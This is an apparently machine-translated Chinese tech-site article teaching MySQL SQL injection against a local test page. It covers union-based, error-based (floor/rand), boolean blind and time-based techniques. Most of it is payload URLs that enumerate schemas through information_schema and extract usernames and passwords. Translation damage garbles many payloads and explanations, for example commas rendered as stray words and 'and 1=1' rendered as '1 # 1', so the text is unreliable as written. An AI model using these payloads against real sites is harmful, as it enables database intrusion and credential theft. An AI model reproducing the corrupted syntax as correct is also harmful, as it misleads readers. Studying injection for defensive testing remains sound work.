Shulou(Shulou.com)06/01 Report--

Let's talk about the main categories of MYSQL injection. The secret of the text is that it is close to the topic. So, no gossip, let's go straight to the following, I believe that after reading the main categories of MYSQL injection this article will certainly benefit you.

Mysql injection classification:

1. Error-based injection with display bits (joint injection)

(1) judging injection

And 1 # 1, http://127.0.0.1/union.php?id=1 and 1 # 1

And 1-2, http://127.0.0.1/union.php?id=1 and 1-2

And 1 outputs the result, while and 1 does not have a result, indicating that the and statement was executed successfully and there may be sql injection.

(2) judgment column

Http://127.0.0.1/union.php?id=1 order by 1

Http://127.0.0.1/union.php?id=1 order by 2

Http://127.0.0.1/union.php?id=1 order by 3

Http://127.0.0.1/union.php?id=1 order by 4

When querying how many columns in the current database are order by 1, order by 2, and order by 3, they all return normal, and when order by 4 returns an error, you can determine that there are currently three columns.

(3) explosion indication position

When union queries, the following query results are spliced to the end of select query results.

Http://127.0.0.1/union.php?id=1 union select 1,2,3

There is no output of display bits when using union select 1 id 2 and 3, because there is a limit 0re1 restriction after the limit statement, only the first row of the query is displayed, and the id information of the query is not displayed if the id input is incorrect.

Http://127.0.0.1/union.php?id=-1 union select 1,2,3

Id=- 1, when the id input is wrong, the output displays the bit 1pm 2pm 3.

(4) obtain the database

With the display bit, we can substitute the corresponding display bit to query what we want, such as the database name.

Http://127.0.0.1/union.php?id=-1 union select 1 (), 3

Get the database as s.

(5) get the data table

Then look at the tables in the s database

Http://127.0.0.1/union.php?id=-1 union select 1 focus group concat (table_name), 3 from information_schema.tables where table_schema='s'

Use information_schema to query the tables table in the database, and find out that the table in database s is student.

There are all databases, all tables, and all columns in the information_schema database.

(6) get the data column

Next, query which columns are in the student table

Http://127.0.0.1/union.php?id=-1 union select 1 focus group concat (column_name), 3 from information_schema.columns where table_name='student'

Using information_schema database to get three columns of id, username and password in student table.

(7) get content

Query contents of username and password

Http://127.0.0.1/union.php?id=-1 union select 1,username,password from student

Get the contents of the username,password column in the student table and get the user root password 123456.

two。 Error-based injection of database error information (error injection)

There are ten kinds of error injection in mysql

Add error statement

If (! $res) {die (mysql_error ());}

(1) obtain database version information

Http://127.0.0.1/union.php?id=1 and (select 1 from (select count (*), concat ((select (select (select concat (0x7e dint version (), 0x7e) from information_schema.tables limit 0L1), floor (rand (0) * 2) x from information_schema.tables group by x) a)

(2) get the database information.

Control the database to be obtained by controlling LIMIT

Http://127.0.0.1/union.php?id=1 and (select 1 from (select count (), concat ((select (select (SELECT distinct concat (0x7e) FROM informationschema.schemata LIMIT 1) from informationschema.tables limit 0Magi 1), floor (rand (0) 2) x from informationschema.tables group by x) a)

(3) get the table of the current database

Different table names are also controlled by controlling LIMIT.

Http://127.0.0.1/union.php?id=1 and (select 1 from (select count (*), concat ((select (select (SELECT distinct concat (0x7e) FROM information_schema.tables where table_schema=database () LIMIT 0Magne1)) from information_schema.tables limit 0Magne 1), floor (rand (0) * 2) x from information_schema.tables group by x) a)

(4) get the column name of the users table

Http://127.0.0.1/union.php?id=1 and (select 1 from (select count (*), concat ((select (select (SELECT distinct concat (0x7e) FROM information_schema.columns where table_name='student' LIMIT 1) from information_schema.tables limit 0Magi 1), floor (rand (0) * 2) x from information_schema.tables group by x) a)

(5) obtain the contents of username and password fields

Http://127.0.0.1/union.php?id=1 and (select 1 from (select count (), concat) (select (select (SELECT distinct concat (0x23 (0x23) FROM student limit 0pr 1)) from informationschema.tables limit 0penny 1), floor (rand (0) 2) x from informationschema.tables group by x) a)

Blind note: when executing the injection statement, there will be no display bits or database error information, just a correct and an error display page, when the statement is executed correctly, the page will return to normal, when the execution error, there will be an abnormal interface, but there will not be any database error messages.

3. Blind note without database error information based on error

(1) using joint query union blind injection

Http://127.0.0.1/union.php?id=1 union select 1, order by 2, order by 3.

Sort according to the third column, the first three values of the third column are not displayed if they are greater than 122, as shown in the figure.

Http://127.0.0.1/union.php?id=1 union select 1, 2, 12, 6, order by 3

And so on, modify the value of the third bit to obtain information, and the first three values of the third column are displayed if they are less than 126, as shown in the figure.

(2) No joint query union blind injection (ASCII)

Follow the idea of half query.

Guess the database name:

Http://127.0.0.1/union.php?id=1 and ascii (substr (database (), 1je 1)) > 0

Substr (database (), 1Pol 1) splits database name characters, starting with the first character, one character at a time.

The ascii () function converts the segmented characters into ASCII values.

As shown in the figure, the query result shows that the first character ascii of the database name is greater than 0.

Http://127.0.0.1/union.php?id=1 and ascii (substr (database (), 1je 1)) > 120

As shown in the figure, no query results indicate that the first character ascii of the database name is less than 120.

Http://127.0.0.1/union.php?id=1 and ascii (substr (database (), 1meme 1)) = 115

By analogy, the first character ascii of the database name is 115,

Use Xiaokui multi-function conversion tool to convert the characters corresponding to ASCII, 115 is the letter s.

Then the database name can be guessed by analogy.

Guess the table name of the database:

Http://127.0.0.1/union.php?id=1 and ascii (substr ((select table_name from information_schema.tables where table_schema='s' limit 0jue 1), 1pm 1)) = 115

By guessing ascii, you can get that the ascii code of the first string of the first table in the s database is 115, that is, the character s. By the same token, guess in turn.

Column names in the guessing list:

Http://127.0.0.1/union.php?id=1 and ascii (substr ((select column_name from information_schema.columns where table_name='student' limit 0jue 1), 1pm 1)) = 105

Get the ascii code 105 of the first string of the first column name of the student table, and guess the character I in turn.

Guess the contents of the column:

Http://127.0.0.1/union.php?id=1 and ascii (substr ((select username from student limit 0jue 1), 1pm 1)) = 114

The ascii code of the first string of username is 114, which is the letter r, which is guessed in turn.

4. Time-based blind injection

Use firebug (F12) of Firefox to monitor the execution time of the script

Http://127.0.0.1/union.php?id=1 and if (ascii (substr (database (), 1Jue 1)) = 115 (3), 1)

Guess the database, the correct execution of the statement was delayed by 3 seconds.

What are the main categories and related contents of the above MYSQL injection, is there anything you don't understand? Or if you want to know more about it, you can continue to follow our industry information section.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.